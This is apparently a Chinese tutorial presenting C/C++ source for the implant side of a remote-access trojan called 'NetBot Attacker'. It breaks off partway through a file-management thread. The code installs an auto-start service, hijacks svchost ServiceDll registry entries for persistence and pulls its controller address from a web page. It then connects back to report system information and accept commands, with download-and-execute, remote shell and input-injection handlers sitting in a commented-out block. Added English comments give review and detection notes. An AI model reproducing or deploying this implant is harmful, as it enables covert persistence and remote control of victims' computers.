之前已经对Windows服务进行了讲解,那么如何安装Windows服务,使其作为远程控制的服务端呢?
安装Windows服务代码如下
- #include "stdafx.h"
- //#include <windows.h>
- #include "InstallService.h"
- #include <winsvc.h>
// Starts the named service through the Service Control Manager.
//
// Steps: open the SCM database, open the service, switch its start type to
// SERVICE_AUTO_START, call the Win32 StartService, then poll
// QueryServiceStatus while the state is SERVICE_START_PENDING.
//
// NOTE(review): this one-argument StartService is a user-defined overload of
// the Win32 StartService(SC_HANDLE, DWORD, LPCTSTR*); the three-argument call
// inside the body resolves to the Win32 function.
//
// Return value: FALSE only when OpenSCManager fails. An OpenService failure,
// a ChangeServiceConfig failure and any StartService error other than
// ERROR_SERVICE_ALREADY_RUNNING still yield TRUE, so TRUE does not mean the
// service is actually running.
//
// Detection note: the start-type change and the service start are recorded by
// the Service Control Manager in the System event log (a start-type change is
// typically event 7040).
BOOL StartService(LPCTSTR lpService)
{
    SC_HANDLE schSCManager;
    SC_HANDLE schService;
    SERVICE_STATUS ServiceStatus;
    DWORD dwErrorCode;
    schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);// open the Service Control Manager database
    if (schSCManager!=NULL)
    {
        schService=::OpenService(schSCManager,lpService,SERVICE_ALL_ACCESS);// obtain a handle to the service object
        if (schService!=NULL)
        {
            // Set the service to start automatically; the return value is not checked
            ChangeServiceConfig(schService, SERVICE_NO_CHANGE, SERVICE_AUTO_START, SERVICE_NO_CHANGE,
                NULL, NULL, NULL, NULL, NULL, NULL, NULL);
            if(StartService(schService,0,NULL)==0)// the service already exists, so start it (Win32 StartService)
            {
                dwErrorCode=GetLastError();
                if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
                {
                    // Already running counts as success; close both handles before returning
                    CloseServiceHandle(schSCManager);
                    CloseServiceHandle(schService);
                    return true;
                }
                // Any other start error falls through to the status poll below and is lost
            }
            // Wait while the service is still starting; the loop also ends if
            // QueryServiceStatus itself fails
            while(QueryServiceStatus(schService,&ServiceStatus)!=0)
            {
                if(ServiceStatus.dwCurrentState==SERVICE_START_PENDING)
                {
                    Sleep(100);
                }
                else
                {
                    break;
                }
            }
            CloseServiceHandle(schService);
        }
        CloseServiceHandle(schSCManager);
    }
    else
        return FALSE;
    return TRUE;
}
// Stops the named service and marks it disabled.
//
// Steps: open the SCM database and the service, set the start type to
// SERVICE_DISABLED, and if the service is not already SERVICE_STOPPED send
// SERVICE_CONTROL_STOP and poll QueryServiceStatus every 10 ms while the
// state is SERVICE_STOP_PENDING.
//
// Return value: FALSE only when OpenSCManager fails; every other failure
// (OpenService, ChangeServiceConfig, ControlService) still returns TRUE.
//
// NOTE(review): inside the polling loop the return value of QueryServiceStatus
// is ignored, so if the query starts failing the cached state never changes
// and the loop does not terminate.
BOOL StopService(LPCTSTR lpService)
{
    SC_HANDLE schSCManager;
    SC_HANDLE schService;
    SERVICE_STATUS RemoveServiceStatus;
    schSCManager=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);// open the Service Control Manager database
    if (schSCManager!=NULL)
    {
        schService=::OpenService(schSCManager,lpService,SERVICE_ALL_ACCESS);// obtain a handle to the service object
        if (schService!=NULL)
        {
            // Set the service to disabled; the return value is not checked
            ChangeServiceConfig(schService, SERVICE_NO_CHANGE, SERVICE_DISABLED, SERVICE_NO_CHANGE,
                NULL, NULL, NULL, NULL, NULL, NULL, NULL);
            if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
            {
                if(RemoveServiceStatus.dwCurrentState!=SERVICE_STOPPED)// stop the service
                {
                    if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
                    {
                        // Poll until the stop completes (see the note above about a failing query)
                        while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING)
                        {
                            Sleep(10);
                            QueryServiceStatus(schService,&RemoveServiceStatus);
                        }
                    }
                }
            }
            CloseServiceHandle(schService);
        }
        ::CloseServiceHandle(schSCManager);
    }
    else
        return FALSE;
    return TRUE;
}
// Repoints an existing svchost-hosted service at a different DLL.
//
// Stops the service, writes lpDllPath to the REG_EXPAND_SZ value "ServiceDll"
// under HKLM\SYSTEM\CurrentControlSet\Services\<lpService>\Parameters, then
// restarts the service. Returns the result of the final StartService call, or
// FALSE when the registry key cannot be opened or the value cannot be written.
//
// Error handling: failures throw a string literal that is caught below; the
// catch only copies GetLastError() into rc, which is never read afterwards, so
// the cause is effectively discarded. NOTE(review): a string literal has type
// const char[N]; `catch(char *str)` matches it only under MSVC's legacy
// non-const literal conversion — confirm against the build settings, since
// under conforming rules the throw would go uncaught.
//
// NOTE(review): wsprintf does not bound its output to sizeof(szOpenKey), so a
// long service name can overrun the MAX_PATH buffer. The return value of
// StopService is ignored.
//
// Detection note: a write to ...\Services\<name>\Parameters\ServiceDll is a
// well-known svchost-hosted persistence indicator and a high-value registry
// audit target.
BOOL ReplaceSvchostService(LPCTSTR lpService,LPCTSTR lpDllPath)
{
    int rc = 0;
    HKEY hKey = 0;
    BOOL bRet = FALSE;
    char szOpenKey[MAX_PATH];
    try
    {
        // Pause (stop) the service
        StopService(lpService);
        // Change which DLL the service points to
        ZeroMemory(szOpenKey,sizeof(szOpenKey));
        wsprintf(szOpenKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", lpService);
        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);
        if(ERROR_SUCCESS != rc)
            throw "";
        // REG_EXPAND_SZ: the stored path may contain unexpanded environment variables
        rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)lpDllPath, strlen(lpDllPath)+1);
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegSetValueEx(ServiceDll)";
        // Run the service
        bRet = StartService(lpService);
    }
    catch(char *str)
    {
        if(str && str[0])
        {
            rc = GetLastError();
        }
    }
    // hKey is still 0 when RegOpenKeyEx failed; RegCloseKey then just returns an error
    RegCloseKey(hKey);
    return bRet;
}
// Installs a new svchost-hosted service whose code lives in strDllPath.
//
// Steps:
//  1. InstallService(...) creates the service with the image path
//     "%SystemRoot%\System32\svchost.exe -k krnlsrvc".
//  2. Creates HKLM\SYSTEM\CurrentControlSet\Services\<name>\Parameters and
//     writes strDllPath into the REG_EXPAND_SZ value "ServiceDll".
//  3. Writes the service name into the REG_MULTI_SZ value "krnlsrvc" under
//     HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, which defines
//     the svchost group named on the command line in step 1.
//  4. Starts the service; bRet is the result of that final StartService call
//     (the value InstallService returned is overwritten).
//
// NOTE(review): a REG_MULTI_SZ value needs a terminating pair of NULs; the
// size strlen(strServiceName)+1 supplies only one. RegSetValueEx also replaces
// the whole "krnlsrvc" group value, so anything previously listed there is
// lost.
//
// NOTE(review): hKey is closed at the end of steps 2 and 3 and then closed
// again after the try block, so on the success path the final RegCloseKey
// operates on an already-closed handle.
//
// Error handling mirrors ReplaceSvchostService: string literals are thrown and
// `catch(char *str)` only stores GetLastError() into rc, which is not used
// afterwards (the same const-literal caveat applies).
//
// Detection note: a new value under the Svchost key, a service whose ImagePath
// is svchost.exe with a group name that is not one of the built-in groups, and
// a ServiceDll pointing at a third-party DLL are each strong persistence
// indicators.
BOOL InstallSvchostService(LPCSTR strServiceName,
    LPCSTR strDisplayName,
    LPCSTR strDescription,
    LPCSTR strDllPath)
{
    int rc = 0;
    HKEY hKey = 0;
    BOOL bRet = FALSE;
    char szOpenKey[MAX_PATH];
    try
    {
        // Install the service
        bRet = InstallService(strServiceName,
            strDisplayName,
            strDescription,
            "%SystemRoot%\\System32\\svchost.exe -k krnlsrvc");
        // Change which DLL the service points to
        ZeroMemory(szOpenKey,sizeof(szOpenKey));
        wsprintf(szOpenKey, "SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters", strServiceName);
        //rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);
        rc = RegCreateKey(HKEY_LOCAL_MACHINE, szOpenKey,&hKey);
        if(ERROR_SUCCESS != rc)
            throw "";
        rc = RegSetValueEx(hKey, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned char*)strDllPath, strlen(strDllPath)+1);
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegSetValueEx(ServiceDll)";
        RegCloseKey(hKey);
        // Add the service name to the svchost group (the original comment says
        // "netsvcs group"; the value actually written is "krnlsrvc")
        ZeroMemory(szOpenKey,sizeof(szOpenKey));
        strcpy(szOpenKey, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost");
        rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, szOpenKey, 0, KEY_ALL_ACCESS, &hKey);
        if(ERROR_SUCCESS != rc)
            throw "RegOpenKeyEx(Svchost)";
        rc = RegSetValueEx(hKey, "krnlsrvc", 0, REG_MULTI_SZ, (unsigned char*)strServiceName, strlen(strServiceName)+1);
        SetLastError(rc);
        if(ERROR_SUCCESS != rc)
            throw "RegSetValueEx(Svchost\\krnlsrvc)";
        RegCloseKey(hKey);
        bRet = StartService(strServiceName);
    }
    catch(char *str)
    {
        if(str && str[0])
        {
            rc = GetLastError();
        }
    }
    RegCloseKey(hKey);
    return bRet;
}
// Registers a Win32 service with the Service Control Manager and starts it.
//
// Creates the service (SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START,
// SERVICE_ERROR_IGNORE) with strPathName as its image path; if it already
// exists, opens it and starts it instead. Then writes strDescription to the
// REG_SZ value "Description" under
// HKLM\SYSTEM\CurrentControlSet\Services\<name>, and finally calls
// StartService. Returns TRUE only when that final StartService succeeds.
//
// Cleanup is done in the SEH __finally block, so every __leave still closes
// the registry and SCM handles.
//
// NOTE(review): SERVICE_INTERACTIVE_PROCESS is a dwServiceType flag but is
// OR'ed into the dwDesiredAccess argument here; it appears misplaced and has
// no effect on the service type in that position.
// NOTE(review): for an already-existing service, StartService is called once in
// the ERROR_SERVICE_EXISTS branch and again at the end; if the first call
// succeeds the second fails with ERROR_SERVICE_ALREADY_RUNNING and the
// function returns FALSE even though the service is running.
// NOTE(review): RegOpenKey's return value is not checked, and the Description
// is written with lstrlen(strDescription) bytes, i.e. without the terminating
// NUL that REG_SZ expects. If CreateService fails for any reason other than
// ERROR_SERVICE_EXISTS, svc stays NULL and the final StartService fails.
//
// Detection note: service creation through CreateService is logged by the SCM
// (System event 7045 on Windows 7 and later) and, with the relevant audit
// policy enabled, as Security event 4697.
BOOL InstallService(LPCSTR strServiceName,
    LPCSTR strDisplayName,
    LPCSTR strDescription,
    LPCSTR strPathName)
{
    BOOL bRet = FALSE;
    HKEY key=NULL;
    SC_HANDLE svc=NULL, scm=NULL;
    __try
    {
        scm = OpenSCManager(0, 0,SC_MANAGER_ALL_ACCESS);
        if (!scm)
            __leave;
        svc = CreateService(
            scm,
            strServiceName,
            strDisplayName,
            SERVICE_ALL_ACCESS|SERVICE_INTERACTIVE_PROCESS,   // dwDesiredAccess (see note above)
            SERVICE_WIN32_OWN_PROCESS,
            SERVICE_AUTO_START,
            SERVICE_ERROR_IGNORE,
            strPathName,
            NULL, NULL, NULL, NULL, NULL);
        if (svc == NULL)
        {
            if (GetLastError() == ERROR_SERVICE_EXISTS)
            {
                // Service already registered: reuse it
                svc = OpenService(scm,strServiceName,SERVICE_ALL_ACCESS);
                if (svc==NULL)
                    __leave;
                else
                    StartService(svc,0, 0);
            }
        }
        // Write the description straight into the service's registry key
        char Desc[MAX_PATH];
        wsprintf(Desc,"SYSTEM\\CurrentControlSet\\Services\\%s", strServiceName);
        RegOpenKey(HKEY_LOCAL_MACHINE,Desc,&key);
        RegSetValueEx(key,"Description",0,REG_SZ,(CONST BYTE*)strDescription,lstrlen(strDescription));
        if (!StartService(svc,0, 0))
            __leave;
        bRet = TRUE;
    }
    __finally
    {
        if (key!=NULL)
            RegCloseKey(key);
        if (svc!=NULL)
            CloseServiceHandle(svc);
        if (scm!=NULL)
            CloseServiceHandle(scm);
    }
    return bRet;
}
// Marks the named service for deletion.
//
// Opens the SCM and the service and calls DeleteService. The service is not
// stopped first: DeleteService only flags it, and the SCM removes the entry
// once the service has stopped and all handles to it are closed. Nothing is
// returned; OpenSCManager/OpenService failures are silently ignored.
void UninstallService(LPCTSTR strServiceName)
{
    SC_HANDLE scm,svc;
    scm=::OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (scm!=NULL)
    {
        svc=::OpenService(scm, strServiceName, SERVICE_ALL_ACCESS);
        if (svc!=NULL)
        {
            ::DeleteService(svc);
            ::CloseServiceHandle(svc);
        }
        ::CloseServiceHandle(scm);
    }
}
如何实现远程控制的一系列功能呢,如键盘、鼠标远程协助,文件上传下载,视频截获,桌面视频截获等等?
请见代码与注释
- #include "stdafx.h"
- #include "svchost.h"
- #include <shlwapi.h>
- #include "../Seu_lib/Functions.h"
- #include "InstallService.h"
- #include "../Seu_lib/zconf.h"
- #include "../Seu_lib/zlib.h"
- #pragma comment(lib,"../Seu_lib/zlib.lib") //图象无损数据压缩使用zlib库函数
- #pragma comment(lib,"shlwapi.lib")
- #pragma comment(linker,"/IGNORE:4078")
- #pragma comment(linker,"/OPT:NOWIN98")
- //#define NETBOT_TEST
- /////////////////////////////////////////////////////////////////////////////////////////////
// Embedded configuration of the implant, with its compiled-in defaults.
// All fields are fixed-size; presumably so the block can be located and
// patched in the binary by a builder tool — not shown here, confirm.
//
// Triage note: these constant strings (locator, version "080625", service
// name/display/description "NetBot" / "NetBot Attacker") are static in the
// image and are natural candidates for a file signature.
struct MODIFY_DATA
{
    char strIPFile[128];    // IP file or DNS: either "host:port" or an http URL to fetch it from (see GetIpAndPort)
    char strVersion[16];    // server-side (implant) version
    DWORD dwVipID;          // VIP ID; also used as the EncryptData key in ConnectThread
    BOOL bReplace;          // TRUE - replace an existing service, FALSE - create a new service
    char strSvrName[32];    // service name
    char strSvrDisp[100];   // service display name
    char strSvrDesc[100];   // service description
    char ServerAddr[100];   // controller address, filled in by GetIpAndPort
    int ServerPort;         // controller port, filled in by GetIpAndPort
}modify_data =
{
    "192.168.1.132:9000",
    "080625",
    62,
    FALSE,
    "NetBot",
    "NetBot Attacker",
    "NetBot Attacker",
    " ",
    8080,
};
// Module handle of this DLL; referenced by the commented-out CMD_UNINSTALL
// handler in ConnectThread to find its own file name
HMODULE g_hDllModule;
// Resolves a dotted-quad or host name to an IPv4 address in network byte order.
//
// inet_addr is tried first; on failure it returns INADDR_NONE (0xFFFFFFFF),
// which stored in the signed `long i` is negative, so the code falls back to
// gethostbyname and returns the first address in the hostent. Returns 0 when
// both fail. Side effect of the sign trick: the literal "255.255.255.255" is
// indistinguishable from a failed parse.
unsigned long resolve(char *host)
{
    long i;
    struct hostent *he;
    if((i=inet_addr(host))<0)
        if((he=(struct hostent*)gethostbyname(host))==NULL)//if((he=(struct hostent*)Ggethostbyname(host))==NULL)
            return(0);
        else
            return(*(unsigned long *)he->h_addr);   // first address only
    return(i);
}
// Fills modify_data.ServerAddr / ServerPort from modify_data.strIPFile.
//
// Expected text format is "[host:port]". If strIPFile does not contain "http"
// it is wrapped in brackets and parsed directly; otherwise it is treated as a
// URL and fetched with GetHttpFile (declared elsewhere — presumably in
// ../Seu_lib/Functions.h; confirm) in a loop, sleeping 10 s between attempts,
// until the fetched text contains a "[". Text after "[" up to ":" becomes
// ServerAddr; text after ":" up to "]" is parsed with atoi into ServerPort.
//
// NOTE(review): none of the copies are bounded — html[256] is filled with
// strcpy/strcat/lstrcpy, and the strncpy counts come from strcspn on the
// fetched text rather than from sizeof(ServerAddr)/sizeof(port). The fetch
// loop has no exit other than a successful match. strlwr is applied to the
// buffer GetHttpFile returns; its ownership and lifetime are not visible here.
// NOTE(review): after finding "[" with strstr, the cursor is advanced one
// character from the start of the buffer rather than to the bracket's
// position, so parsing only works when "[" is the first character.
//
// Detection note: the controller address is published on a web page in
// "[host:port]" form and re-fetched every 10 s while absent — a repetitive,
// fingerprintable HTTP request to a fixed URL.
void GetIpAndPort()
{
    char html[256];   // fetched web page (or the wrapped direct address)
    char *point;      // parse cursor
    char port[12];
    memset(html,0,sizeof(html));
    if(strstr(modify_data.strIPFile,"http") == NULL)// no "http": the value is a direct IP/DNS check-in address
    {
        strcpy(html,"[");
        strcat(html,modify_data.strIPFile);
        strcat(html,"]");
    }
    else
    {
        // Fetch the web page content until it contains the opening bracket
        for(;;)
        {
            lstrcpy(html,strlwr(GetHttpFile(modify_data.strIPFile)));
            if(strstr(html,"[")!=NULL)
                break;
            else
                Sleep(10000);
        }
    }
    //MessageBox(NULL,html,NULL,MB_OK);
    // Split out the client (controller) IP and port
    point=html;
    if(strstr(html,"[")!=NULL)
    {
        point=point+strlen("[");
    }
    if(strstr(point,":")!=NULL)
    {
        memset(modify_data.ServerAddr,0,sizeof(modify_data.ServerAddr));
        strncpy(modify_data.ServerAddr,point,strcspn(point,":"));
        point=point+strcspn(point,":")+1;
        if(strstr(point,"]")!=NULL)
        {
            memset(port,0,sizeof(port));
            strncpy(port,point,strcspn(point,"]"));
            modify_data.ServerPort = atoi(port);
        }
    }
}
// Main implant loop (thread entry). Initialises Winsock, then forever:
// refresh the controller address via GetIpAndPort, run ConnectThread on a new
// thread, block until it returns, close the thread handle, sleep 10 s, repeat.
// WSACleanup and the return are unreachable because the loop never exits.
//
// NOTE(review): the CreateThread result is not checked; a NULL handle would be
// passed to WaitForSingleObject/CloseHandle. lParam is unused.
//
// Detection note: with the controller unreachable this yields one outbound
// connection attempt roughly every 10 s (ConnectThread returns immediately on
// connect failure).
DWORD _stdcall RuningThread(LPVOID lParam)
{
    WSADATA lpWSAData;
    WSAStartup(MAKEWORD(2, 2), &lpWSAData);
    while(1)
    {
        GetIpAndPort();
        HANDLE hThread = NULL;
        hThread = CreateThread(NULL,NULL,ConnectThread,NULL,NULL,NULL);
        WaitForSingleObject(hThread, INFINITE);
        CloseHandle(hThread);
        Sleep(10000);
    }
    WSACleanup();
    return 0;
}
// Control-channel thread: connects to modify_data.ServerAddr:ServerPort,
// sends a SysInfo record, then dispatches commands received with RecvMsg
// until the connection drops.
//
// Handshake: GetSystemInfo(m_SysInfo) — evidently a project overload, since it
// is passed a SysInfo object rather than an LPSYSTEM_INFO — plus the VIP ID,
// webcam presence (CVideoCap::IsWebCam) and the version string. The record is
// passed through EncryptData keyed with modify_data.dwVipID, a constant that
// is embedded in the same binary, so the transform offers no confidentiality
// against anyone holding the sample. A MsgHead with dwCmd = SOCKET_CONNECT
// and dwSize = sizeof(SysInfo) frames the send.
//
// Command loop: only CMD_FILEMANAGE is live (it spawns FileManageThread and
// never closes the thread handle); every other handler is inside the block
// comment below. The loop exits when RecvMsg fails; the socket is then shut
// down (0x02 == SD_BOTH) and closed.
//
// Return values: 0 on connect failure, 1 when the initial SendMsg fails, 10
// after the receive loop ends.
//
// NOTE(review): on the connect-failure path MainSocket is not closed (compare
// FileManageThread, which does). The memcpy of m_SysInfo into chBuffer is
// dead — SendMsg is given &m_SysInfo directly. TurnonKeepAlive is a project
// helper; the meaning of its second argument (75) is not visible here. lParam
// is unused.
//
// Detection note: each session is a fresh outbound TCP connection to the
// configured host:port that begins with a fixed-size MsgHead + SysInfo record;
// file management opens a second connection to the same endpoint.
DWORD _stdcall ConnectThread(LPVOID lParam)
{
    struct sockaddr_in LocalAddr;
    LocalAddr.sin_family=AF_INET;
    LocalAddr.sin_port=htons(modify_data.ServerPort);
    LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);
    // the connection socket
    SOCKET MainSocket = socket(AF_INET, SOCK_STREAM, 0);
    if(connect(MainSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)
        return 0;//connect error (socket is leaked, see note above)
    else
        TurnonKeepAlive(MainSocket, 75);
    SysInfo m_SysInfo;
    GetSystemInfo(m_SysInfo);// gather system information (project helper, not the Win32 API)
    m_SysInfo.iVipID = modify_data.dwVipID;
    m_SysInfo.bVideo = CVideoCap::IsWebCam();
    lstrcpy(m_SysInfo.cVersion, modify_data.strVersion);
    EncryptData((unsigned char *)&m_SysInfo, sizeof(SysInfo), modify_data.dwVipID);// encrypt with the product ID (a compiled-in constant)
    //send socket type
    MsgHead msgHead;
    char chBuffer[4096];
    msgHead.dwCmd = SOCKET_CONNECT;// fill in the message header
    msgHead.dwSize = sizeof(SysInfo);
    memcpy(chBuffer,&m_SysInfo, sizeof(SysInfo));// copy in the controlled-host info (unused: SendMsg reads m_SysInfo directly)
    if( !SendMsg(MainSocket, (char *)&m_SysInfo, &msgHead) )
    {
        closesocket(MainSocket);
        return 1;//send socket type error
    }
    while(1)
    {
        // receive a command
        if(! RecvMsg(MainSocket, (char *)chBuffer, &msgHead))
        {// dropped connection or error
            shutdown(MainSocket,0x02);
            closesocket(MainSocket);
            break;
        }
        // dispatch the command
        switch(msgHead.dwCmd)
        {
        case CMD_FILEMANAGE:
            {
                CreateThread(NULL,NULL,FileManageThread,NULL,NULL,NULL);// start a file-management thread
            }
            break;
        /* case CMD_SCREENSTART:
            {
                // get the check-in socket == DWORD
                DWORD dwSock = msgHead.dwExtend1;
                CreateThread(NULL,NULL,ScreenThread,(LPVOID)dwSock,NULL,NULL); // start a screen-transfer thread
            }
            break;
        case CMD_PROCESSSTART:
            {
                CreateThread(NULL,NULL,ProcessThread,NULL,NULL,NULL); // start a process-management thread
            }
            break;
        case CMD_SHELLSTART:
            {
                CreateThread(NULL,NULL,ShellThread,NULL,NULL,NULL); // start a remote-shell thread
            }
            break;
        case CMD_VIDEOSTART:
            {
                CreateThread(NULL,NULL,VideoThread,NULL,NULL,NULL); // start a video-capture thread
            }
            break;
        case CMD_HEARTBEAT:// heartbeat
            {
                // not handled here; could be counted, since the controller sends these on a timer
            }
            break;
        case CMD_UNINSTALL:// uninstall
            {
                shutdown(MainSocket,0x02);
                closesocket(MainSocket);
                lstrcpy(modify_data.strIPFile,"");
                char szDllPath[MAX_PATH],szCmdLine[MAX_PATH];
                GetModuleFileName(g_hDllModule,szDllPath,MAX_PATH);
                MoveFileEx(szDllPath,NULL,MOVEFILE_DELAY_UNTIL_REBOOT);
                wsprintf(szCmdLine, "Rundll32 %s,RundllUninstall", szDllPath);
                WinExec(szCmdLine, SW_HIDE);
            }
            break;
        case CMD_POWEROFF:// power off
            {
                SetPrivilege(SE_SHUTDOWN_NAME,TRUE);
                ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0);
            }
            break;
        case CMD_REBOOT:// reboot
            {
                SetPrivilege(SE_SHUTDOWN_NAME,TRUE);
                ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
            }
            break;
        case CMD_LOGOFF:// log off
            {
                SetPrivilege(SE_SHUTDOWN_NAME,TRUE);
                ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
            }
            break;
        case CMD_DOWNEXEC:// download and execute
            {
                char strUrl[256];
                memset(strUrl, 0, 256);
                lstrcpyn(strUrl, chBuffer,msgHead.dwSize);
                DownExec(strUrl);
            }
            break;
        case CMD_OPENURL:// open a web page
            {
                char strUrl[256];
                memset(strUrl, 0, 256);
                lstrcpyn(strUrl, chBuffer,msgHead.dwSize);
                OpenUrl(strUrl);
            }
            break;
        case CMD_CTRLALTDEL:// Ctrl + Alt + del
            {
            }
            break;
        case CMD_KEYDOWN://WM_KEYDOWN
            {
                XScreenXor OpenDesktop;
                int nVirtKey = msgHead.dwExtend1;
                keybd_event((BYTE)nVirtKey,0,0,0);
            }
            break;
        case CMD_KEYUP://WM_KEYUP
            {
                XScreenXor OpenDesktop;
                int nVirtKey = msgHead.dwExtend1;
                keybd_event((BYTE)nVirtKey,0,KEYEVENTF_KEYUP,0);
            }
            break;
        case CMD_MOUSEMOVE://WM_MOUSEMOVE
            {
                XScreenXor OpenDesktop;
                POINT pt;
                pt.x = msgHead.dwExtend1;
                pt.y = msgHead.dwExtend2;
                SetCursorPos(pt.x, pt.y);
            }
            break;
        case CMD_LBUTTONDOWN://WM_LBUTTONDOWN
            {
                XScreenXor OpenDesktop;
                mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
            }
            break;
        case CMD_LBUTTONUP://WM_LBUTTONUP
            {
                XScreenXor OpenDesktop;
                mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
            }
            break;
        case CMD_LBUTTONDBLCLK://WM_LBUTTONDBLCLK
            {
                XScreenXor OpenDesktop;
                mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
                mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
                mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0);
                mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0);
            }
            break;
        case CMD_RBUTTONDOWN://WM_RBUTTONDOWN
            {
                XScreenXor OpenDesktop;
                mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,0);
            }
            break;
        case CMD_RBUTTONUP://WM_RBUTTONUP
            {
                XScreenXor OpenDesktop;
                mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,0);
            }
            break;
        case CMD_RBUTTONDBLCLK://WM_RBUTTONDBLCLK
            {
                XScreenXor OpenDesktop;
                mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,0);
                mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,0);
                mouse_event(MOUSEEVENTF_RIGHTDOWN,0,0,0,0);
                mouse_event(MOUSEEVENTF_RIGHTUP,0,0,0,0);
            }
            break;
        */
        default:
            break;
        }
    }
    return 10;
}
- //////////////////////////////////////////////////////////////////////////////////
- //文件管理线程
- DWORD _stdcall FileManageThread(LPVOID lParam)
- {
- struct sockaddr_in LocalAddr;
- LocalAddr.sin_family=AF_INET;
- LocalAddr.sin_port=htons(modify_data.ServerPort);
- LocalAddr.sin_addr.S_un.S_addr=resolve(modify_data.ServerAddr);
- SOCKET FileSocket = socket(AF_INET, SOCK_STREAM, 0);
- if(connect(FileSocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)
- {
- closesocket(FileSocket);
- return 0;//connect error
- }
- //================================================================================
- MsgHead msgHead;
- char *chBuffer =
new char[1536 * 1024];
//数据交换区 1.5MB - //send socket type
- msgHead.dwCmd = SOCKET_FILEMANAGE;
- msgHead.dwSize = 0;
-